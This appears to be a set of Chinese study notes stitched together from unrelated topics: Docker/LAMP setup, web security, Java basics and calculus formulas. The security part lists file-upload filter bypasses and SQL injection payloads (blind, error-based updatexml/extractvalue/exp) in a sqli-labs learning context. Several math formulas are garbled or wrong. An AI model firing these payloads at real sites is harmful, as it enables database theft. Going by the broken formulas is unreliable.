这里使用阿里云ECS服务器Ubuntu20.04版本进行搭建
首先看看有哪些lamp的使用的较多,使用docker search lamp
1 | # docker search lamp |
这里我们使用第一个进行安装
1 | # docker pull mattrayner/lamp |
启用名字mylamp,以便以后可以直接使用名字重启
1 | # docker run --name mylamp -p 80:80 -p 3306:3306 -d mattrayner/lamp |
测试运行结果
查看dklamp中的mysql的root密码,使用命令
1 | # docker logs mylamp |
查看密码为46W9QD9oC5Co,用户名为admin
查看所有镜像:docker image ls
查看是否有容器在运行:docker ps
容器停止:docker stop mylamp
容器开始:docker start mylamp
本文采用阿里云ECS服务器实例来进行搭建docker环境
通过xshell或者其他shell工具连接阿里云服务器
由于 apt 源使用 HTTPS 以确保软件下载过程中不被篡改。因此,我们首先需要添加使用 HTTPS 传输的软件包以及 CA 证书
1 | $ sudo apt-get update |
鉴于国内网络问题,强烈建议使用国内源,官方源请在注释中查看
为了确认所下载软件包的合法性,需要添加软件源的 GPG 密钥
1 | $ curl -fsSL https://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg |
然后,我们需要向 sources.list 中添加 Docker 软件源
1 | $ echo \ |
以上命令会添加稳定版本的 Docker APT 镜像源,如果需要测试版本的 Docker 请将 stable 改为 test
在测试或开发环境中 Docker 官方为了简化安装流程,提供了一套便捷的安装脚本,Ubuntu 系统上可以使用这套脚本安装,另外可以通过 —mirror 选项使用国内源进行安装
1 | curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun |
执行这个命令后,脚本就会自动的将一切准备工作做好,并且把 Docker 的稳定(stable)版本安装在系统中
也可以使用国内 daocloud 一键安装命令:
1 | curl -sSL https://get.daocloud.io/docker | sh |
1 | $ sudo systemctl enable docker |
默认情况下,docker 命令会使用 Unix socket与 Docker 引擎通讯。而只有 root 用户和 docker 组的用户才可以访问 Docker 引擎的 Unix socket。出于安全考虑,一般 Linux 系统上不会直接使用 root 用户。因此,更好地做法是将需要使用 docker 的用户加入 docker 用户组
建立docker组
1 | $ sudo groupadd docker |
将当前用户加入docker组
1 | $ sudo usermod -aG docker $USER |
退出当前终端并重新登录,进行如下测试
1 | $ docker run --rm hello-world |
凡是存在文件上传的地方均有可能存在文件上传漏洞,关于上传文件操作的时候对方代码写的是否完整、是否安全,一旦疏忽了某个地方可能会造成文件上传漏洞
网站Web应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上传功能的实现代码没有严格校验上传文件的后缀和文件类型,此时攻击者就可以上传一个webshell到一个Web可访问的目录上,并将恶意文件传递给如PHP解释器去执行,之后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作。还有一部分是攻击者通过Web服务器的解析漏洞来突破Web应用程序的防护
文件可以自定义,可以成为webshell,通过文件上传来上传网站后门,直接获取网站权限,属于高危漏洞。上传漏洞与SQL注入或 XSS相比 , 其风险更大 。可以获取数据库信息,可以对服务器提权,获取内网权限
方式一
先直接传一个PHP,实战先传马
实战先传一个正常的图片,看看有无返回存储地址
如果能直接上传并解析,已离成功不远
方式二
先传一个shell,然后进行修改
connect-Type:image/jpeg,看看是否可以进行绕过,如果不行,在上传内容添加GIF89a
当然上传了还得看是否能够被解析为php,所有的上传都要考虑是否能够被解析
方式三
方法四
如果白名单限制上传
方法五
上传的东西是否被服务器很快的删除或者移除,或者说上传成功,但是无法访问,就得考虑条件竞争
以上均不行,考虑逻辑层面的思路
JS类防护
后缀名
黑名单:明确不允许上传的格式后缀,asp、php、jsp、aspx等。
白名单:明确可以上传的文件后缀。jpg、png、zip、gif等
文件类想
MIME信息:
Content-Type称之为MIME信息,通过伪造Content-Type等来进行上传
文件头
内容头信息
特殊解析信息
使用yijuhua.jpg.zip.php等多后缀,如果没有添加strrchr()、和deldot()的话可以绕过
deldot():删除文件名末尾的点,防止多后缀
strchr(string1,string2):查找字符串在另一个字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符
如果php3、php5、phtml没有定义到黑名单中,且apache开启解析,则可以用这种格式进行绕过
.htaccess解析
仅存在于Apache中
htaccess文件时apache服务器中的一个配置文件,负责相关目录下的网页配置。通过htaccess文件,可以帮助我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能
大小写绕过
对大小写进行强制转换,后缀修改大小写即可绕过
空格绕过
源码中缺少收尾去空函数,则可以通过加空格进行绕过
trim():去除字符串中的空格
点绕过
windows中1.txt和1.txt.两者是一个文件,所以就和空格绕过是一个思路
::$DATA绕过
利用Windows特性
在windows的时候如果文件名+”::$DATA”会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,他的目的就是不检查后缀名
例如:”phpinfo.php::$DATA”Windows会自动去掉末尾的::$DATA变成”phpinfo.php”
点空格点绕过
利用的就是程序员写代码时可能只会过滤一次特殊的关键词等,所以可以通过多次输入重复的关键词或者混着输入关键词来进行绕过
比如:
一次过滤
a.php->a.
a.pphphp->a.php 将中间的php过滤掉,还有一个php
但是当编写的是循环过滤的话,这个就会失效
a.pphphp->a.只要出现php就会过滤
双后缀名绕过
.pphphp
%00截断——GET
原理:
www.xxx.com/qq.jpg
www.xxx.com/qq.php%00.jpg=>www.xxx.com/qq.php
%00是被服务器解码为0x00发挥了截断作用
0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符
%00和0x00是由区别的;%00是URL中的,0x00是文件命名
%00需要PHP版本小于5.3.4,且打开的配置文件php-ini,将magic_quotes_gpc设置为Off
%00截断——POST
post不会解码%00->url编码
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库
分为两类:危害数据库里的数据、直接危害到网站的权限(需要满足条件)
information_schema.schemata 记录所有数据库名
information_schema.tables:记录所有表名信息的表
information_schema.columns:记录所有列名信息的表
schema_name 数据库名
table_name:表名
column_name:列名
table_schema:数据库名
system_user() 查看当前Mysqlsql登录用户名,同下
user() 查看当前MySQL登录的用户名
database() 查看当前使用MySQL数据库名
version() 查看当前MySQL版本
@@version_compile_os 查看操作系统
@@HOSTNAME 主机名称
@@datadir 数据库路径
数字型
通过2-1与1的回显结果判断是否为数字型注入。有可能被()或者(())括起来
字符型
用单引号和双引号进行闭合。也有可能被(),(())包裹
Mysql在5.0以上版本加入了 information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等
这里主要使用mid(),substr(),left()这几个函数来截取字符串慢慢尝试
一般来说,在页面没有任何回显和错误信息提示的时候,我们就会测试时间盲注的方法
主要通过if(length(database())=8,1,sleep())这样来判断语句是否注入成功
之后就是类似于布尔盲注的形式进行判定注入
例:/?id = 1’ and if((substr((select schema_name from information_schema.schmata limit 4,1),1,8)=’security’),1,sleep(5))—+
and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
and updatexml(1,concat(0x5c,(select user()),0x5c),1)
其中concat函数是将其连接成一个字符串,因此不会符合XPath_string的格式,从而出现格式错误,爆出ERROR 1105 (HY000): XPATH syntax error: root@localhost
updatexml()函数
UPDATEXML(XML_document,XPath_string,new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string(Xpath格式的字符串)
第三参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)
select from (select from mysql.user a join mysql.user b)c;
and exp(~(select * from (select user()) a) );
and GeometryCollection(()select *from(select user() )a)b;
and polygon (()select * from(select user())a)b;
and multipoint (()select * from(select user() )a)b;
and multlinestring (()select * from(select user() )a)b;
and multpolygon (()select * from(select user() )a)b;
and linestring (()select * from(select user() )a)b;
常用的请求头
HostHost
Host请求报头域主要用于指定被请求资源的Internet主机和端口号。
如:Host: localhost:8088
User-Agent
User-Agent请求报头域允许客户端将它的操作系统、浏览器和其他属性告诉服务器。登录一些网站时,很多时候都可以见到显示我们的浏览器、系统信息,这些都是此头的作用。
如:User-Agent: Mozilla/5.0
Referer
Referer包含一个URL,代表当前访问URL的上一个URL,也就是说,用户是从什么地方来到本页面。
如:Referer: http://192.168.33.1/sqli/Less-18/
Cookie
Cookie是非常重要的请求头,它是一段文本,常用来表示请求者身份等。
如:Cookie: username=admin; password=admin
Range
Range可以请求实体的部分内容,多线程下载一定会用到此请求头。
如:表示头500字节:Range: bytes=0~499
表示第二个500字节:Range: bytes=500~999
表示最后500字节:Range: bytes=-500
表示500字节以后的范围:Range: bytes=500-
X-Forwarded-For
X-Forwarded-For即XXF头,它代表请求端的IP,可以有多个,中间以逗号隔开。
如:X-Forwarded-For: 8.8.8.8
Accept
Accept请求报头域用于指定客户端接收哪些MIME类型的信息。
如:Accept: text/html
Accept-Charset
Accept-Charset请求报头域用于指定客户端接收的字符集。如果在请求消息中没有设置这个域,默认是任何字符集都可以接收。
如: Accept-Charset: gb2312
通过sqli-labs进行学习
学习参考视频:https://www.bilibili.com/video/BV1e441127Rd
类变量也叫静态变量,是该类的所有对象共享的变量,任何一个该类的对象去访问它时,取到的都是相同的值,同样任何一个该类的对象去修改它时,修改的也是同一个变量
定义语法:
访问修饰符 static 数据类型 变量名(推荐)
static 访问修饰符 数据类型 变量名
类变量是该类的所有对象共享的,而实例变量是每个对象独享的
类方法也叫静态方法
静态方法使用时可以直接使用
又称为初始化块,属于类中的成员,类似于方法,将逻辑语句封装在方法体中,通过{}包围起来
但和方法不同,没有方法名,没有返回,没有参数,只有方法体,而且不用通过对象或类显式调用,而是加载类时,或创建对象时隐式调用
基本语法
[修饰符]{
代码
};
单例模式就是采取一定的方法保证在整个的软件系统中,对某个类只能存在一个对象实例,并且该类只提供一个取得其对象实例的方法
饿汉式VS懒汉式
final可以修饰类、属性、方法和局部变量
当父类的一些方法不能确定时,可以用abstract关键字来修饰该方法,这个方法就是抽象方法,用abstract来修饰该类就是抽象类
接口就是给出一些没有实现的方法,封装到一起,到某个类要使用的时候,在根据具体情况把这些方法写出来
在jdk8后,可以有默认实现方法,需要使用default关键字修饰,也可以有静态方法
接口和继承解决的问题不同
继承的价值在于:解决代码的复用性和可维护性
接口的价值在于:设计好的各种规范,让其他类去实现这些方法
接口比继承更加灵活
接口在一定程度上实现代码解耦
一个类的内部又完整的嵌套了另一个类结构。被嵌套的类称为内部类,嵌套其他类的类称为外部类。内部类可以直接访问私有属性,并且可以体现类与类之间的包含关系
定义在外部类局部位置上
定义在外部类的成员位置上
局部内部类是定义在外部类的局部位置,比如方法中,并且有类名
匿名内部类是定义在外部类的局部位置,比如方法中
定义在外部类的成员位置,没有static修饰
定义在外部类的成员位置,并且有static修饰
方式一:直接赋值String s = “hsp”;
方式二:调用构造器 String s2 = new String(“hsp”);
代表可变的字符序列,可以对字符串内容进行增删
StringBuffer保存的是字符串变量,里面的值可以更改,每次更新实际上可以更新内容,不用更新地址
一个可变的字符序列。不保证同步,用在字符串缓冲区被单个线程使用
HashSet添加元素底层实现
扩容机制
去重机制
hashCode() + equals(),底层先通过存入对象,进行运算得到一个hash值,通过hash值得到对应的索引,如果发现table索引所在的位置,没有数据,就直接存放,如果有数据,就进行equals比较,不相同就加入,否则不加入
去重机制
如果你传入了一个Comparator匿名对象,就使用实现的compare去重,如果方法返回0,就认为是相同的,不添加。如果没有传入一个Comparator匿名对象,则以添加的对象实现的Comparable接口的compareTo去重
六大遍历方式
使用泛型好处
泛型介绍
细节
JDK(Java Development Kits Java开发工具包) = JRE(Java Runtime Environment Java运行环境)+ java开发工具
JRE = JVM(Java Virtual Machine Java虚拟机) + 核心类库
当左右两边都是数值型时,则做加法运算
当左右两边有一方为字符串,则做拼接运算
System.out.println(“100”+98);//10098
System.out.println(100+”98”);/10098
当java程序在进行赋值或运算时,精度小的类型自动转换为精度大的数据类型,为自动类型转换
取模%的本质 a%b = a - a / b * b
&&与&的区别(||与|类似)
无符号右移 >> 算术右移 << 算术左移
基本语法:条件表达式?表达式1:表达式2
表达式1和表达式2要为可以赋给接收变量的类型(或可以自动转换)
规则:从最低位开始,将每个位上的数据提取出来,乘以n的(位数-1)次方,然后求和
规则:将该数不断除以n,直到商为0为止,然后将每步得到的余数倒过来,就是对应的n进制
规则:从低位开始,将二进制数$sqrt(n)$位一组,转成对应的n进制数即可
规则:将n进制数每一位,转成对应点一个$sqrt(n)$位二进制数即可
程序从上到下逐行地执行,中间没有任何判断和跳转
注意case穿透,当没有break时,会跳到下一个执行语句,一直下去
基本语法
for(循环变量初始化;循环条件;循环变量迭代){
循环操作(可以多条语句);
}
基本语法
while(循环条件){
循环体(语句);
循环变量迭代;
}
do{
循环体(语句);
循环变量迭代;
}while(循环条件)
1 | lable1: |
语法:数据类型 数组名[] = {元素值,元素值,,,}
指将需要处理的所有数据都加载到内部存储器中进行排序
数据量过大,无法全部加载到内存中,需要借助外部存储进行排序
方式1 语法:类型[][] 数组名 = new 类型[大小][大小]
方式2
先声明:类型 数组名[][]
再定义数组名 = new 类型 [大小][大小]
赋值
Java内存的结构分析
形参列表
方法调用细节
同一个类中,多个同名方法的存在,但要求形参列表不一致
重载的好处
注意事项
构造方法又叫构造器,是类的一种特殊的方法,它的主要作用是完成对新对象的初始化
三大作用
命名规则:只能包含数字、字母、下划线、小圆点,不能用数字开头,不能是关键字或保留字
命名规范:com.公司名.项目名.业务模块名
公开级别:用public修饰
受保护级别:用protected修饰,对子类和同一个包中的类公开
默认级别:没有修饰符号,向同一个包的类公开
私有级别:用private修饰,只有类本身可以访问,不对外公开
封装就是把抽象出的数据[属性]和对数据的操作[方法]封装在一起,数据被保护在内部,程序的其他部分只有通过被授权的操作[方法],才能对数据进行操作
class 子类 extends 父类{
}
子类就会自动拥有父类定义的属性和方法
父类又叫超类,基类
子类又叫派生类
多态的前提是:两个对象存在继承关系
多态的向上转型
多态的向下转型
属性没有重写之说,属性的值看编译类型
instanceOf比较操作符,用于判断对象的运行类型是否为xx类型或xx类型的子类型
多态数组:数组定义类型为父类类型,里面保存的实际元素类型为子类类型
多态参数:方法定义的形参类型为父类类型,实参类型运行子类类型
默认返回:全类名+@+哈希值的十六进制,子类往往重写toString方法,用于返回对象的属性信息
在断点调试过程中,是运行状态,是以对象的运行类型来执行的
证明重极限不存在常用方法
沿两种不同路径极限不同(通常可取过($x_0,y_0$)的直线)
若$\lim\limits_{\substack{x\rightarrow x_0 \\y\rightarrow y_0}}f(x,y)=f(x_0,y_0)$,则称$f(x,y)$在$(x_0,y_0)$处连续
设$u=u(x,y),v=v(x,y)$可导,$z=f(u,v)$在相应点有连续一阶偏导数,则
由一个方程所确定的隐函数
设$F(x,y,z)$有连续一阶偏导数,$F’_z\ne0,z=z(x,y)$由$F(x,y,z)=0$所确定
方法:
注:
若$p(x,y)$和$Q(x,y)$有一阶连续偏导数,且$P(x,y)dx+Q(x,y)dy$是某一函数的全微分,则$\frac{\delta P}{\delta y}=\frac{\delta Q}{\delta x}$
极值的必要条件
设$z=f(x,y)$在点$(x_0,y_0)$存在偏导数,且$(x_0,y_0)$为$f(x,y)$的极值点,则$f’_x(x_0,y_0)=0,f’_y(x_0,y_0)=0$
极值的充分条件
设$z=f(x,y)$在点$P_0(x_0,y_0)$的某邻域内有二阶连续偏导数,又$f’_x(x_0,y_0),f’_y(x_0,y_0)=0$,记$A=f’’_{xx}(x_0,y_0),B=f’’_{xy}(x_0,y_0),C=f’’_{yy}(x_0,y_0)$
有下列结论
求具有二阶连续偏导数二元函数$z=f(x,y)$极值的一般步骤为:
(1) 求出f(x,y)的驻点$P_1,\dotsb,P_k$
(2) 利用极值的充分条件判定驻点$P_i$是否为极值点
二元函数$z=f(x,y)$在偏导数不存在的点也可能取到极值(如$f(x,y)=\sqrt{x^2+y^2}$,而这种点是否取得极值一般用极值定义判定
求$z=f(x,y)$在条件$\varphi(x,y)=0$下的条件极值的一般方法:
(1) 构造拉格朗日函数$F(x,y,\lambda)=f(x,y)+\lambda\varphi(x,y)$;
(2) 将$F(x,y,\lambda)$分别对$x,y,\lambda$求偏导数,构造方程组
求连续函数$f(x,y)$在有界闭区域D上的最大最小值三部曲
(1) 求f(x,y)在D内部可能的极值点
(2) 求f(x,y)在D的边界上的最大最小值
(3) 比较
应用题
点到直线的距离公式:
直线为$Ax+By+C=0,A,B\ne0$,则直线外一点$(x_0,y_0)$到该直线最短的距离为$d=\frac{Ax_0+By_0+C}{\sqrt{A^2+B^2}}$
三角形面积公式:海伦公式
设三角形三边为x,y,z,周长为2p,则面积为$S=\sqrt{p(p-a)(p-b)(p-c)}$
二重积分$\iint_Df(x,y)d\sigma$是一个数。当$f(x,y)\ge0$时,其值等于以积分域D为底,以曲面$z=f(x,y)$为曲顶的曲顶柱体的体积
若$f(x,y)$在D上连续,则$\iint_Df(x,y)d\sigma=f(\xi,\eta)S$,其中$(\xi,\eta)\in D,S$为积分域D的面积
先y后x
若积分域D是X型区域,即积分域D可以用不等式$y_1(x)\le y\le y_2(x),a\le x\le b$来表示,则
先x后y
若积分域D是Y型区域,即积分域D可以用不等式$x_1(y)\le x\le x_2(y),c\le y\le d$来表示,则
先r后$\theta$
若积分域D可以用不等式$r_1(\theta)\le r\le r_2(\theta),\alpha\le\theta\le\beta$,来表示,则
(1) 若积分域D关于y轴对称,f(x,y)关于x有奇偶性,则:
(1) 若积分域D关于x轴对称,f(x,y)关于y有奇偶性,则:
二重积分$\iint_Df(x,y)d\sigma$的积分域D是点(x,y)的集合,记为$D_{(x,y)}$,类似一元定积分的值与积分变量用什么记号无关,则
即把二重积分的被积函数f(x,y)及积分域$D_{(x,y)}$中的x和y对调,积分值不变
| 种类 | 通解公式或解法 |
|---|---|
| 可分离变量的微分方程 $\frac{dy}{dx}=f(x,y)$,其中$f(x,y)=\varPhi_1(x)\varPhi_2(y)$ | 解法: $\frac{dy}{dx}=f(x,y)\implies\frac{dy}{dx}=\varPhi_1(x)\varPhi_2(y)$ $\implies\frac{dy}{\varPhi_2(y)}=\varPhi_1(x)dx$ $\implies\int\frac{dy}{\varPhi_2(y)}=\int\varPhi_1(x)dx+C$ |
| 齐次微分方程 $\frac{dy}{dx}=f(x,y)$,其中$f(x,y)=\varPhi(\frac{y}{x})$ | 解法: $\frac{dy}{dx}=f(x,y)\implies\frac{dy}{dx}=\varPhi(\frac{y}{x})$ $\xRightarrow{\frac{y}{x}=u} u+x\frac{du}{dx}=\varPhi(u)$ $\implies \int \frac{du}{\varPhi(u)-u}=\int \frac{dx}{x}+C$ |
| 一阶齐次线性微分方程 $\frac{dy}{dx}+P(x)y=0$ | 通解公式: $y = Ce^{-\int P(x)dx}$(其中C为任意常数) |
| 一阶非齐次线性微分方程 $\frac{dy}{dx}+P(x)y=Q(x)$ | 通解公式: $y=[\int Q(x)e^{\int P(x)dx}dx+C]e^{-\int P(x)dx}$(其中C为任意常数) |
| 种类 | 解法 |
|---|---|
| $y^{(n)}=f(x)$ | $y^{(n)}=f(x)$进行n次不定积分 |
| $f(x,y’,y’’)=0$ | 令$y’=p,y’’=\frac{dp}{dx},f(x,y’,y’’)=0$化为$f(x,p,\frac{dp}{dx})=0$ |
| $f(y,y’,y’’)=0$ | $y’=p,y’’=\frac{dy}{dx}\cdot\frac{dp}{dy}=p\frac{dp}{dy},f(y,y’,y’’)=0$化为$f(y,p,p\frac{dp}{dy})=0$ |
n阶齐次线性微分方程
形如
n阶非齐次线性微分方程
形如
若$f(x)=f_1(x)+f_2(x)$,则(2)可分解为如下两个方程:
| 方程形式 | $y’’+py’+qy=0$(其中p,q为常数) |
|---|---|
| 特征方程 | $\lambda^2+p\lambda+q=0$ |
| $\Delta=p^2-4q$的情况 | $y’’+py’+qy=0$的通解 |
| $\Delta>0$ | $y=C_1e^{\lambda_1x}+C_2^{\lambda_2x}$($C_1,C_2$为任意常数) |
| $\Delta=0$ | $y=(C_1+C_2x)e^{\lambda_1x}$($C_1,C_2$为任意常数) |
| $\Delta<0$ | $\lambda_1=\alpha+i\beta,\lambda_2=\alpha-i\beta$ $y=e^{\alpha x}(C_1\cos\beta x+C_2\sin\beta x)$ |
对$y’’’+py’’+qy’+ry=0$(其中p,q,r为常数),特征方程为
(1) 若特征值$\lambda_1,\lambda_2,\lambda_3$为实单根,则通解为$y=C_1e^{\lambda_1x}+C_2^{\lambda_2x}+C_3e^{\lambda_3x}$
(2) 若特征值$\lambda_1=\lambda_2\not=\lambda_3$为实根,则通解为$y=(C_1+C_2x)e^{\lambda_1x}+C_3e^{\lambda_3x}$
(3) 若特征值$\lambda_1=\lambda_2=\lambda_3$为实根,则通解为$y=(C_1+C_2x+C_3x^2)e^{\lambda_1x}$
(4) 若$\lambda_{1,2}=\alpha\pm i\beta,\lambda_3\in R$,则通解为$y=e^{\alpha x}(C_1\cos\beta x+C_2\sin\beta x))+C_3e^{\lambda_3x}$
类型一:$f(x)=e^{kx}P_n(x)$,其中$P_n(x)$为n次多项式
(1) 当$k\not ={\lambda_1}$且$k\not ={\lambda_2}$时,令特解$y_0(x)=(a_0+a_1x+…+a_nx^n)e^{kx}=Q(x)e^{kx}$
(2) 当$k={\lambda_1}$且$k\not ={\lambda_2}$时,令特解$y_0(x)=x(a_0+a_1x+…+a_nx^n)e^{kx}=xQ(x)e^{kx}$
(3) 当$k={\lambda_1}={\lambda_2}$时,令特解$y_0(x)=x^2(a_0+a_1x+…+a_nx^n)e^{kx}=x^2Q(x)e^{kx}$
类型二:$f(x)=e^{\alpha x}[P_m(x)cos\beta x+P_s(x)sin\beta x]$,其中$P_m,P_s(x)$分别为m及s次多项式
(1) 当$\alpha+i\beta$不是特征值时,令$y_0=e^{\alpha x}[Q_n^{(1)}(x)cos\beta x+Q_n^{2}(x)sin\beta x$,其中n=max{m,s},且$Q_n^{1}(x),Q_n^{2}(x)$为两个n次多项式
(2) 当$\alpha+i\beta$是特征值时,令$y_0=xe^{\alpha x}[Q_n^{(1)}(x)cos\beta x+Q_n^{2}(x)sin\beta x$,其中n=max{m,s},且$Q_n^{1}(x),Q_n^{2}(x)$为两个n次多项式
原函数
$F’(x)=f(x)$
不定积分
$\int f(x)dx=F(x)+C$
(1) 若$f(x)$在区间$I$上连续,则$f(x)$在区间$I$上必有原函数
(2) 若$f(x)$在区间$I$上有第一类间断点,则$f(x)$在区间$I$上没有原函数
(3) 若$f(x)$在区间$I$上只有震荡间断点,则$f(x)$在区间$I$上可能存在原函数(专指不定积分)
(23) $\int\tan^2xdx=\sec^2x-1+C$
(24) $\int\arcsin xdx=x\arcsin x+\sqrt{1-x^2}$
(25) $\int_{-\infty}^{+\infty}e^{-x^2}dx=\sqrt{\pi}$
(26) $\int_{-\infty}^{+\infty}e^{-\frac{x^2}{a}}dx=\sqrt{a}\int_{-\infty}^{+\infty}e^{-(\frac{x}{\sqrt{a}})^2}d\frac{x}{\sqrt{a}}=\sqrt{a\pi}$
若$\int f(u)du=F(u)+C, and\varphi(x)$可导,则
设函数$x=\varphi(t)$可导,且$\varphi’(t)\ne0$,又设$\int f(\varphi(t))\varphi’(t)dt=F(t)+C$,则$\int f(x)dx=\int f(\varphi(t))\varphi’(t)dt=F(\varphi^{-1}(x))+C$
三种常用的变量代换
(1) 被积函数中含有$\sqrt{a^2-x^2}$时,令$x=a\sin t,or x = a\cos t$
(2) 被积函数中含有$\sqrt{a^2-x^2}$时,令$x=a\tan t$
(3) 被积函数中含有$\sqrt{a^2-x^2}$时,令$x=a\sec t$
设$u(x),v(x)$有连续一阶导数,则$\int udv=uv-\int vdu$
(1) 一般方法(万能代换)
令$\tan\frac{x}{2}=t$
$\sin\alpha=\frac{2\tan\frac{\alpha}{2}}{1+\tan^2\frac{\alpha}{2}}、\cos\alpha=\frac{1-\tan^2\frac{\alpha}{2}}{1+\tan^2\frac{\alpha}{2}}、dx=\frac{2dt}{1+t^2}$
(2) 特殊方法(三角变形,换元,分部)
令$\sqrt[n]{\frac{ax+b}{cx+d}}=t$,将其化为有理函数积分进行计算
必要条件
若$\int_a^bf(x)dx$存在,则$f(x)$在[a,b]上有界
充分条件
(1) 若$f(x)$在[a,b]上连续,则$\int_a^bf(x)dx$必定存在
(2) 若$f(x)$在[a,b]上有界,且只有有限个间断点,则$\int_a^bf(x)dx$必定存在
(3) 若$f(x)$在[a,b]上只有有限个第一类间断点,则$\int_a^bf(x)dx$必定存在
f(x)在[a,b]上可积,则$\int_a^xf(t)dt$连续
牛顿莱布尼茨公式
如果函数$F(x)$是连续函数$f(x)$在区间[a,b]上的一个原函数,则$\int_a^bf(x)dx=F(b)-F(a)$
换元积分法
设f(x)在区间[a,b]上连续,函数$x=\varphi(t)满足以下条件$:
(1) $\varphi(\alpha)=a,\varphi(\beta)=b$
(2) $\varphi(t)$在$\alpha,\beta$上具有连续导数,且其值域$R_\varphi=[a,b]$,则
分部积分法
设函数$u(x)、v(x)$在[a,b]上有连续一阶导数,则$\int_a^budv=uv|\overset{b}{a}-\int_a^bvdu$
利用奇偶性和周期性
(1) 设$f(x)$为[-a,a]上的连续函数(a>0),则
(2) 设$f(x)$是以T为周期的连续函数,则对任给数a,总有$\int_a^{a+T}f(x)dx=\int_0^Tf(x)dx$
利用公式
(1)
(2) $\int_0^\pi xf(\sin x)dx=\frac{\pi}{2}\int_0^\pi f(\sin x)dx$(其中$f(x)$连续)
定理
若$f(x)$在[a,b]上连续,则$\int_a^xf(t)dt$在[a,b]上可导且$(\int_a^xf(t)dt)’=f(x)$
有关$F(x)=\int_a^xf(t)dt$在一点处的可导性的结论
| $f(x)$ | $F(x)=\int_a^xf(t)dt$ |
| —- | —- |
|连续|可导,且$F’(x_0)=f(x_0)$|
|可去间断|可导,且$F’(x_0)=\lim\limits_{x\rightarrow x_0}f(x)$|
|跳跃间断|连续但不可导,且$F_+’(x_0)=f(x_0^+),F_-‘(x_0)=f(x_0^-)$|
变上限求导的三个类型
(1) $(\int_{\varphi(x)}^{\psi(x)}f(t)dt)’= f(\psi(x))\psi’(x)-f(\varphi(x))\varphi’(x)$
(2) $(\int_a^bf(x,t)dt)’=\int_a^b\frac{\vartheta f(x,t)}{\vartheta x}dt$
连续性
设$f(x)$在[a,b]上可积,则$\int_a^xf(x)dt$在[a,b]上连续
奇偶性
(1) 若$f(x)$为奇函数,则$\int_a^xf(t)dt$为偶函数
(2) 若$f(x)$为偶函数,则$\int_0^xf(t)dt$为奇函数
不等式
(1) 若$f(x)\le g(x),x\in[a,b]$,则$\int_a^bf(x)dx\le\int_a^bg(x)dx$
(2) 若$f(x)$在[a,b]上连续,则$m(b-a)\le\int_a^bf(x)dx\le M(b-a)$,其中m,M分别为$f(x)$在[a,b]上的最小值与最大值
(3) $|\int_a^bf(x)dx|\le\int_a^b|f(x)|dx$
积分中值定理
(1) 若$f(x)$在[a,b]上连续,则$\int_a^bf(x)dx=f(\xi)(b-a),a<\xi<b$
(2) 若$f(x),g(x)$在[a,b]上连续,且$g(x)$不变号,则$\int_a^bf(x)g(x)dx=f(\xi)\int_a^bg(x)dx,a\le\xi\le b$
柯西积分不等式:$(\int_a^bf(x)g(x)dx)^2\le\int_a^bf^2(x)dx\int_a^bg^2(x)dx$
定义 设$f(x)$为$(-\infty,+\infty)$上的连续函数,如果反常积分$\int_{-\infty}^0f(x)dx$和$\int_0^{+\infty}f(x)dx$都收敛,则称反常积分$\int_{-\infty}^{+\infty}f(x)dx$收敛,且$\int_{-\infty}^{+\infty}f(x)dx=\int_{-\infty}^0f(x)dx+\int_0^{+\infty}f(x)dx$
如果$\int_{-\infty}^0f(x)dx$与$\int_0^{+\infty}f(x)dx$之一发散,则称$\int_{-\infty}^{+\infty}f(x)dx$发散
定理1(比较判别法) 设$f(x),g(x)$在$[a,+\infty)$上连续,且$0\le f(x)\le g(x)$,且
(1) 当$\int_a^{+\infty}g(x)dx$收敛时,$\int_a^{+\infty}f(x)dx$收敛
(2) 当$\int_a^{+\infty}f(x)dx$发散时,$\int_a^{+\infty}g(x)dx$发散
定理2(比较法的极限形式) 设$f(x),g(x)$在$[a,+\infty)$上非负连续,且$\lim\limits_{x\rightarrow+\infty}\frac{f(x)}{g(x)}=\lambda$(有限或无穷),则
(1) 当$\lambda\ne0$时,$\int_a^{+\infty}f(x)dx$与$\int_a^{+\infty}g(x)dx$同敛散
(2) 当$\lambda=0$时,若$\int_a^{+\infty}g(x)dx$收敛,则$\int_a^{+\infty}f(x)dx$也收敛
(3) 当$\lambda=+\infty$时,若$\int_a^{+\infty}g(x)dx$发散,则$\int_a^{+\infty}f(x)dx$也发散
常用结论:
定理1(比较判别法 设$f(x),g(x)$在$(a,b]$上连续,且$0\le f(x)\le g(x),x=a$为$f(x)$和$g(x)$的瑕点,则
(1) 当$\int_a^bg(x)dx$收敛时,$\int_a^bf(x)dx$收敛
(2) 当$\int_a^bf(x)dx$发散时,$\int_a^bg(x)dx$发散
定理2(比较法的极限形式 设$f(x),g(x)$在$(a,b]$上非负连续,且$\lim\limits_{x\rightarrow a^+}\frac{f(x)}{g(x)}=\lambda$(有限或无穷),则
(1) 当$\lambda\ne0$时,$\int_a^{b}f(x)dx$与$\int_a^{b}g(x)dx$同敛散
(2) 当$\lambda=0$时,若$\int_a^bg(x)dx$收敛,则$\int_a^bf(x)dx$也收敛
(3) 当$\lambda=+\infty$时,若$\int_a^bg(x)dx$发散,则$\int_a^bf(x)dx$也发散
常用结论:
平面图形的面积
设有平面域D,则该平面域D的面积为$\iint_D1d\sigma$
